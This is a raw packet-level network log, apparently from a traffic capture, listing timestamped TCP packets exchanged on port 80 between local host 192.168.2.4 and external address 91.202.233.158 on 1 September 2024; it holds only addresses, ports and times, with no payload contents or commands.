Sep 1, 2024 18:28:21.410505056 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410748959 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410758972 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410768032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410778046 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410785913 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410789967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410799980 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410804033 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410811901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410824060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410825014 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410835028 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410845041 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410845995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410862923 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410868883 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410873890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.410897017 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.410906076 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.411243916 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411254883 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411278009 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411283016 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.411288977 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411298990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411309004 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411319971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411320925 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.411330938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411334038 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.411341906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411353111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411358118 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.411364079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411374092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411390066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411395073 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.411395073 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.411401033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411411047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411422014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411426067 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.411452055 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.411462069 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.411899090 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411910057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411920071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411925077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411938906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411955118 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411957979 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.411966085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411974907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411984921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.411986113 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.411994934 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.411997080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412008047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412018061 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.412019014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412026882 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.412030935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412041903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412055016 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.412079096 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.412502050 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412512064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412522078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412533045 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412538052 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.412544966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412555933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412564993 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.412568092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412578106 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412587881 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.412590027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412600994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412606001 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.412617922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412628889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412638903 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.412640095 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412646055 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.412652016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412663937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412673950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.412677050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.413330078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.413340092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.413350105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.413360119 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.413360119 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.413360119 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.413368940 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.413371086 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.413382053 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.413392067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.413398981 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.413403034 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.413414955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.413424015 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.413443089 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.413460970 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.497960091 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.498841047 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.540188074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540199995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540210009 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540222883 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540250063 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.540302038 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.540309906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540388107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540397882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540407896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540426970 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.540441990 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.540553093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540564060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540574074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540585041 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540590048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.540596962 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540604115 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.540606976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540620089 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.540622950 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.540647984 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.540668011 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541091919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541101933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541111946 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541125059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541136026 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541161060 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541302919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541312933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541321993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541332960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541342020 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541348934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541354895 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541359901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541371107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541382074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541383028 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541393995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541404009 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541408062 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541419029 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541445971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541455030 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541465044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541480064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541490078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541501045 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541505098 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541512966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541516066 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541522980 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541534901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541548014 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541548967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541559935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541569948 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541569948 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541580915 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541583061 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541593075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541603088 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.541610956 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.541637897 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542310953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542320967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542330027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542340994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542351961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542356014 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542362928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542366982 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542373896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542386055 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542397976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542398930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542408943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542418957 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542423010 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542431116 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542440891 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542459011 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542478085 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542638063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542659998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542670965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542680979 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542691946 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542694092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542701960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542711973 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542718887 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542728901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542731047 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542742014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542749882 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542752028 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542763948 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542773962 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542773962 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542790890 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542810917 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.542973995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542984009 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.542994976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543005943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543009996 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543015957 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543026924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543034077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543036938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543054104 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543062925 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543065071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543075085 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543076992 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543087959 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543100119 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543107986 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543109894 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543122053 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543133974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543148041 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543584108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543595076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543605089 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543615103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543629885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543629885 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543642044 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543654919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543664932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543674946 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543675900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543688059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543698072 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543698072 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543709993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543719053 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543720961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543732882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543740988 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543744087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543755054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543765068 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543766975 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543778896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543783903 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543791056 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543802023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543811083 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543812037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543823957 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543832064 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543836117 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543845892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543847084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.543870926 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.543900013 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.544435024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.544445992 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.544455051 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.544466972 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.544477940 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.544487000 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.544495106 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.544502020 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.544506073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.544514894 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.544517040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.544543982 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.544564962 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.627578020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.627593040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.627603054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.627643108 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.627659082 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.628364086 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628374100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628384113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628395081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628406048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628406048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.628416061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628429890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628441095 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.628457069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628468037 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.628468990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628484011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628496885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628500938 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.628508091 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628520012 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628520012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.628531933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628542900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628549099 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.628561020 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.628585100 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.628748894 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628765106 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628776073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628787994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628788948 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.628798962 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.628803015 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.628822088 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.628844023 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.629018068 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.629029036 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.629036903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.629057884 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.629067898 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.629077911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.629079103 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.629087925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.629097939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.629106045 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:21.629110098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.629120111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.629128933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:21.629131079 CEST	56177	80	192.168.2.4	91.202.233.158
